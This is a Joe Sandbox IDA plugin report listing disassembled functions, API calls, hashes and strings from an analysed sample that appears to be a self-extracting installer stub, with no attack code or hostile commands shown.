Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
Instruction ID: f920c74330c8bea86978497107333c2b8e7ef69701de9f597e4ce46cb6d114b0
Opcode Fuzzy Hash: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
Instruction Fuzzy Hash: 401186752012089FE7155F62EF84AA776BCF704745B04843EF586612B1CB79AC10DF2D

Function 0040360E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(00405642,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?,00405642,0041BF84,00407A78,00000000,00000000,?), ref: 00403657
??3@YAXPAX@Z.MSVCRT(00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?,00405642,0041BF84,00407A78), ref: 00403692
??3@YAXPAX@Z.MSVCRT(00405642,00405642,0041E89C,00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?), ref: 004036B5
??3@YAXPAX@Z.MSVCRT(00000000,00405642,00405642,0041E89C,00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000), ref: 004036BD

Strings

%%T\, xrefs: 00403638
%%T/, xrefs: 00403673

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%T/$%%T\
API String ID: 3447362686-2679640699
Opcode ID: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
Instruction ID: 051198a5a84e8eab651e9532c73f3d1e84a216c654f8844b6e35c77aa68833ba
Opcode Fuzzy Hash: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
Instruction Fuzzy Hash: 17112B319481096ACB05F792EC53DFEB77A9E54318F10016FF712A20A1EF686AC6C699

Function 004036C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(00405613,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?,00405613,0041BF84,00407A78,00000000,00000000,?), ref: 00403711
??3@YAXPAX@Z.MSVCRT(00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?,00405613,0041BF84,00407A78), ref: 0040374C
??3@YAXPAX@Z.MSVCRT(00405613,00405613,0041E794,00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?), ref: 0040376F
??3@YAXPAX@Z.MSVCRT(00000000,00405613,00405613,0041E794,00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000), ref: 00403777

Strings

%%S\, xrefs: 004036F2
%%S/, xrefs: 0040372D

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%S/$%%S\
API String ID: 3447362686-358529586
Opcode ID: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
Instruction ID: 8a838fedbf1cd3f57b408fd45307b2668bf9ac3bef67c8916e08563063fd3bd5
Opcode Fuzzy Hash: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
Instruction Fuzzy Hash: 13112B319480096ACB05F792DC53DFEB7799E54314F10016FF712A21A1EF686AC6C699

Function 00403782 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?,0040561F,0041BF84,00407A78,00000000,00000000,?), ref: 004037CB
??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?,0040561F,0041BF84,00407A78), ref: 00403806
??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,0041E7AC,0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?), ref: 00403829
??3@YAXPAX@Z.MSVCRT(00000000,0040561F,0040561F,0041E7AC,0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000), ref: 00403831

Strings

%%M/, xrefs: 004037E7
%%M\, xrefs: 004037AC

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%M/$%%M\
API String ID: 3447362686-4143866494
Opcode ID: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
Instruction ID: 030220e8798e44c826c8ca556ead690550140fee0cdfed357d3ace2c4a35e24d
Opcode Fuzzy Hash: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
Instruction Fuzzy Hash: E2112B329480096ACB05F792DC53DFEB7799E54314F10016FF612A21A1EF686AC6C699

Function 00415556 Relevance: 10.5, APIs: 7, Instructions: 34COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415561
??3@YAXPAX@Z.MSVCRT(?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415575
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415580
??3@YAXPAX@Z.MSVCRT(00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 0041558B
??3@YAXPAX@Z.MSVCRT(?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415596
??3@YAXPAX@Z.MSVCRT(?,?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 004155A1
??3@YAXPAX@Z.MSVCRT(?,?,?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?), ref: 004155AC

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
Instruction ID: 4fa50ddcceeb69e8f72710d2ea5ebf37512df2501741efa383495b0307b540d7
Opcode Fuzzy Hash: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
Instruction Fuzzy Hash: E701C0B1800B41ABD231AF27C919887FEF2FF94304344592FE08702A25CB75B891DF88

Function 0040A049 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 166sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,0041E89C,00000000,00000000), ref: 0040A241

Strings

FinishMessage, xrefs: 0040A16B, 0040A181, 0040A1B6
HelpText, xrefs: 0040A1DC
ErrorTitle, xrefs: 0040A141
BeginPrompt, xrefs: 0040A088
WarningTitle, xrefs: 0040A256

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Sleep
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$WarningTitle
API String ID: 3472027048-1960609661
Opcode ID: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
Instruction ID: 6ded7748b71ab9f5b936a386d8eac6af1666c8eea906bb290fcf471db964143e
Opcode Fuzzy Hash: cf9250849fedc6f67974e0ceab6cd0c6a5807e8a287a7b517c2b9e144e56b559
Instruction Fuzzy Hash: 6151B134E0174587EB24ABA689117AE73A1AF50318F14807FE8023B3D1EB7D59A5D64F

Function 00416E4A Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 354COMMON

Download Yara Rule

APIs

Part of subcall function 004161F4: ??3@YAXPAX@Z.MSVCRT(?,?,00416647,?), ref: 004161F9
Part of subcall function 004161F4: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00416647,?), ref: 00416214

Part of subcall function 00416221: ??3@YAXPAX@Z.MSVCRT(?,?,00416EAA,00000000,00000001,?,?,0000000B,00000000), ref: 00416226
Part of subcall function 00416221: ??2@YAPAXI@Z.MSVCRT(?,?,?,00416EAA,00000000,00000001,?,?,0000000B,00000000), ref: 00416232

Part of subcall function 0040C020: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C034
Part of subcall function 0040C020: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C04E
Part of subcall function 0040C020: memcpy.MSVCRT(?,?,00000000,?,?,0040C179,?,?,?,?,?,?,?,00419A60,000000FF), ref: 0040C068

??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,00000000,00000001,?,?,0000000B,00000000), ref: 00416F2C
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,00000000,00000001,?,?,0000000B,00000000), ref: 00416F34

Part of subcall function 004161C7: ??3@YAXPAX@Z.MSVCRT(?,00000000,00416D8C,00000001,00000009,00000000), ref: 004161CC
Part of subcall function 004161C7: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,00416D8C,00000001,00000009,00000000), ref: 004161E7

Part of subcall function 004167C5: memset.MSVCRT ref: 004167DD

Strings

!, xrefs: 004170CE
, xrefs: 004170B3
@, xrefs: 004170A9

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@$memcpymemset
String ID: $!$@
API String ID: 1807930983-2517134481
Opcode ID: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
Instruction ID: f55dd101b204f21da1f631f5c3487a3bc2704fd2e33f175c23863e5c7b78e8a3
Opcode Fuzzy Hash: 5a0cd3f31a62d73317b64d85696ae4bafc855b5bd178d0b226f6844185e35667
Instruction Fuzzy Hash: C0E13D70904249DFCF14DF95C580AEDBBB2BF49314F25849EE806AB352D739A9C2CB58

Function 004013A6 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 004013EF
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 00401427
??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,0041E7B8,0041E7B8,0041E7B8,?,00406805,00000000,?,00000000), ref: 00401431
GetTickCount.KERNEL32 ref: 00401452
??3@YAXPAX@Z.MSVCRT(?), ref: 0040147E
??3@YAXPAX@Z.MSVCRT(?), ref: 00401491

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@$CountTick
String ID:
API String ID: 590505967-0
Opcode ID: dbc5a267aae96199abb321f813b19ad4c45933dca4bf6f3a90f53bd09cd1a26d
Instruction ID: a6903403f5f4fcf2204198b93a2ae2fd4058f2025a7845204c1723fd466c5d3b
Opcode Fuzzy Hash: dbc5a267aae96199abb321f813b19ad4c45933dca4bf6f3a90f53bd09cd1a26d
Instruction Fuzzy Hash: F531D331A00111AFCF25AFA5C8899AEB7A5AF05314F14407FF942B72B1DB388D81D798

Function 00406013 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00406644,?,00406644,?,0041E844,;!@InstallEnd@!,0041E844,;!@Install@!UTF-8!,0041E484,00000000,00000001,?,00000000,0041E7B8), ref: 004060F8

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000,0041E7B8), ref: 00406094
??3@YAXPAX@Z.MSVCRT(00406644,?,00406644,?,0041E844,;!@InstallEnd@!,0041E844,;!@Install@!UTF-8!,0041E484,00000000,00000001,?,00000000,0041E7B8), ref: 00406110

Strings

;!@Install@!UTF-8!, xrefs: 004060AF
;!@InstallEnd@!, xrefs: 004060C9

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 750647942-372238525
Opcode ID: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
Instruction ID: 6115e21da8c550f7c259bf06f757151a7c4d16b5fd4a7f66b5d549820aeda24a
Opcode Fuzzy Hash: 5e59d807e14aaf3d26393f531f0b858b024678a1285ae17b53bb4701f65fa082
Instruction Fuzzy Hash: 69315271D00219ABCF05EF95DD929EEBB75BF54314F20002BF512B22E2DB381A95CB29

Function 0040439D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C

GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
wsprintfW.USER32 ref: 00404400
GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

Strings

PreExtract, xrefs: 004043A1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: PathTemp$??2@??3@AttributesFilewcsncpywsprintf
String ID: PreExtract
API String ID: 342973707-1883995278
Opcode ID: 4754dd3ff6774aabc1f35bd0900d899d6f3fa381659397aea7e9fa8c202ad21f
Instruction ID: 87ce6a64adcde4581c58fbcd89a197d799c86788f89504f70527ff8ba021350e
Opcode Fuzzy Hash: 4754dd3ff6774aabc1f35bd0900d899d6f3fa381659397aea7e9fa8c202ad21f
Instruction Fuzzy Hash: EE0100B07012086BC214AF6ADC4492EF399EFC0758B01457EF206A76E2CF79991587A9

Function 0040758D Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 004075D3
??3@YAXPAX@Z.MSVCRT(?,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 00407600
??2@YAPAXI@Z.MSVCRT(00000048,0041E868,0041AA3C,0041E868,0041E868,0041E868,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040760F
??3@YAXPAX@Z.MSVCRT(?,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040765D
??3@YAXPAX@Z.MSVCRT(?,?,004074EC,00000000,00000000,0041AA3C,PreExtract,PreExtract,0041E89C,00000000), ref: 0040766F

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: 75212ddedd759167315a9b93dd9dba7832f0b089d27dc0147d4a255857f60f82
Instruction ID: a987b35fad98e116647973f19acdcfb235c3ad9f5bac28a4ad03e7c43b89f24f
Opcode Fuzzy Hash: 75212ddedd759167315a9b93dd9dba7832f0b089d27dc0147d4a255857f60f82
